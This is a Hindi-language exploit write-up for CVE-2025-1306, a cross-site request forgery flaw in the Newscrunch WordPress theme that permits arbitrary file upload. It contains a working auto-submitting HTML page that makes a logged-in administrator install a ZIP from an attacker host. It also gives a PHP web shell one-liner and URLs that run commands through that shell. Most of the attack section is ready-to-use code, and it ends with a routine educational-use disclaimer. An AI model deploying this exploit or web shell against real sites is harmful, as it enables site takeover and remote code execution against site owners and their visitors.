
Newscrunch <= 1.8.4 - क्रॉस-साइट अनुरोध जालसाजी से मनमानी फ़ाइल अपलोड
यह शोषण Newscrunch WordPress थीम में एक क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) से मनमाना फ़ाइल अपलोड कमज़ोरी (CVE-2025-1306) को लक्षित करता है। newscrunch_install_and_activate_plugin() फ़ंक्शन में nonce सत्यापन की कमी के कारण, एक अप्रमाणित हमलावर एक लॉग-इन व्यवस्थापक को सर्वर पर मनमानी फ़ाइलें अपलोड करने के लिए धोखा दे सकता है, जिससे रिमोट कोड निष्पादन (RCE) हो सकता है।
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:Hशोषणीयता: व्यवस्थापक को एक तैयार किए गए दुर्भावनापूर्ण लिंक पर जाना आवश्यक है।
यह शोषण एक प्रमाणित व्यवस्थापक को CSRF हमला करने के लिए मजबूर करता है जो एक वेब शेल युक्त दुर्भावनापूर्ण ZIP फ़ाइल अपलोड करता है।
<!DOCTYPE html>
<html>
<head>
<title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
<h2>Click anywhere to load content...</h2>
<script>
function sendExploit() {
var form = document.createElement("form");
form.method = "POST";
form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";
var input = document.createElement("input");
input.type = "hidden";
input.name = "plugin_url";
input.value = "http://attacker.com/shell.zip";
form.appendChild(input);
document.body.appendChild(form);
form.submit();
}
window.onload = function() {
sendExploit();
};
</script>
</body>
</html>
📌 बदलें:
http://target.com/ को कमज़ोर WordPress साइट सेhttp://attacker.com/shell.zip को एक दुर्भावनापूर्ण ZIP पेलोड से जिसमें वेब शेल हो।<?php system($_GET['cmd']); ?>
📌 सफल शोषण के बाद, शेल तक पहुँचें:
http://target.com/wp-content/plugins/shell.php?cmd=whoami
http://target.com/wp-content/plugins/shell.php?cmd=ls
यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है। कमज़ोरियों का अनधिकृत शोषण अवैध है और कानून द्वारा दंडनीय है। लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। जिम्मेदारी से उपयोग करें।